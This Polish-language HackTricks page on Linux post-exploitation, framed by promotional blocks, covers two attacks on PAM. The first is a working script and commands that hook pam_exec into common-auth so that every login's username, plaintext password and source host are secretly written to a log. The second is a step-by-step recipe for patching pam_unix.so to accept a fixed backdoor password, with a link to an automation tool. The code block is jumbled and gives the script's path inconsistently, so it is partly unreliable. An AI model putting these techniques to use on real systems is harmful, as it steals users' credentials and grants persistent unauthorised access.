hacktricks/linux-hardening/linux-post-exploitation/README.md

# Linux Po eksploatacji

<details>

<summary><strong>Naucz się hakować AWS od zera do bohatera z</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Inne sposoby wsparcia HackTricks:

* Jeśli chcesz zobaczyć swoją **firmę reklamowaną w HackTricks** lub **pobrać HackTricks w formacie PDF**, sprawdź [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Zdobądź [**oficjalne gadżety PEASS & HackTricks**](https://peass.creator-spring.com)
* Odkryj [**Rodzinę PEASS**](https://opensea.io/collection/the-peass-family), naszą kolekcję ekskluzywnych [**NFT**](https://opensea.io/collection/the-peass-family)
* **Dołącz do** 💬 [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegramowej**](https://t.me/peass) lub **śledź** nas na **Twitterze** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>

## Podsłuchiwanie haseł logowania za pomocą PAM

Skonfigurujmy moduł PAM, aby rejestrował każde hasło, które użytkownik używa do logowania. Jeśli nie wiesz, czym jest PAM, sprawdź:

{% content-ref url="pam-pluggable-authentication-modules.md" %}
[pam-pluggable-authentication-modules.md](pam-pluggable-authentication-modules.md)
{% endcontent-ref %}

**Aby uzyskać więcej szczegółów, sprawdź [oryginalny post](https://embracethered.com/blog/posts/2022/post-exploit-pam-ssh-password-grabbing/)**. Oto tylko streszczenie:

**Przegląd techniki:**
Pluggable Authentication Modules (PAM) oferują elastyczność w zarządzaniu uwierzytelnianiem w systemach opartych na Unixie. Mogą zwiększać bezpieczeństwo poprzez dostosowywanie procesów logowania, ale mogą również stanowić ryzyko w przypadku niewłaściwego użycia. To streszczenie przedstawia technikę przechwytywania danych uwierzytelniających za pomocą PAM oraz strategie łagodzenia zagrożeń.

**Przechwytywanie danych uwierzytelniających:**
- Tworzony jest skrypt bash o nazwie `toomanysecrets.sh`, który rejestruje próby logowania, przechwytując datę, nazwę użytkownika (`$PAM_USER`), hasło (przez stdin) i adres IP zdalnego hosta (`$PAM_RHOST`) do pliku `/var/log/toomanysecrets.log`.
- Skrypt jest wykonywalny i integrowany z konfiguracją PAM (`common-auth`) za pomocą modułu `pam_exec.so` z opcjami cichego uruchamiania i ujawniania tokena uwierzytelniania skryptowi.
- Ta metoda pokazuje, jak wykorzystać skompromitowany host Linux do dyskretnego rejestrowania danych uwierzytelniających.
```bash
#!/bin/sh
echo " $(date) $PAM_USER, $(cat -), From: $PAM_RHOST" >> /var/log/toomanysecrets.log
sudo touch /var/log/toomanysecrets.sh
sudo chmod 770 /var/log/toomanysecrets.sh
sudo nano /etc/pam.d/common-auth
# Add: auth optional pam_exec.so quiet expose_authtok /usr/local/bin/toomanysecrets.sh
sudo chmod 700 /usr/local/bin/toomanysecrets.sh
```
### Backdooring PAM

**Aby uzyskać więcej szczegółów, sprawdź [oryginalny post](https://infosecwriteups.com/creating-a-backdoor-in-pam-in-5-line-of-code-e23e99579cd9)**. Oto tylko streszczenie:

Pluggable Authentication Module (PAM) to system używany w systemie Linux do uwierzytelniania użytkowników. Działa na trzech głównych koncepcjach: **nazwa użytkownika**, **hasło** i **usługa**. Pliki konfiguracyjne dla każdej usługi znajdują się w katalogu `/etc/pam.d/`, gdzie biblioteki współdzielone obsługują uwierzytelnianie.

**Cel**: Zmodyfikuj PAM, aby umożliwić uwierzytelnianie za pomocą określonego hasła, omijając rzeczywiste hasło użytkownika. Skupiamy się szczególnie na bibliotece współdzielonej `pam_unix.so`, używanej przez plik `common-auth`, który jest dołączany przez prawie wszystkie usługi w celu weryfikacji hasła.

### Kroki do modyfikacji `pam_unix.so`:

1. **Zlokalizuj dyrektywę uwierzytelniania** w pliku `common-auth`:
- Linia odpowiedzialna za sprawdzanie hasła użytkownika wywołuje `pam_unix.so`.
2. **Zmodyfikuj kod źródłowy**:
- Dodaj instrukcję warunkową w pliku źródłowym `pam_unix_auth.c`, która udziela dostępu, jeśli używane jest określone hasło, w przeciwnym razie kontynuuje zwykły proces uwierzytelniania.
3. **Skompiluj ponownie i zastąp** zmodyfikowaną bibliotekę `pam_unix.so` w odpowiednim katalogu.
4. **Testowanie**:
- Dostęp jest udzielany w różnych usługach (logowanie, ssh, sudo, su, wygaszacz ekranu) za pomocą określonego hasła, podczas gdy normalne procesy uwierzytelniania pozostają niezmienione.

{% hint style="info" %}
Możesz zautomatyzować ten proces za pomocą [https://github.com/zephrax/linux-pam-backdoor](https://github.com/zephrax/linux-pam-backdoor)
{% endhint %}

<details>

<summary><strong>Naucz się hakować AWS od zera do bohatera z</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Inne sposoby wsparcia HackTricks:

* Jeśli chcesz zobaczyć swoją **firmę reklamowaną w HackTricks** lub **pobrać HackTricks w formacie PDF**, sprawdź [**PLAN SUBSKRYPCYJNY**](https://github.com/sponsors/carlospolop)!
* Zdobądź [**oficjalne gadżety PEASS & HackTricks**](https://peass.creator-spring.com)
* Odkryj [**Rodzinę PEASS**](https://opensea.io/collection/the-peass-family), naszą kolekcję ekskluzywnych [**NFT**](https://opensea.io/collection/the-peass-family)
* **Dołącz do** 💬 [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegramowej**](https://t.me/peass) lub **śledź** nas na **Twitterze** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Podziel się swoimi trikami hakerskimi, przesyłając PR-y do** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>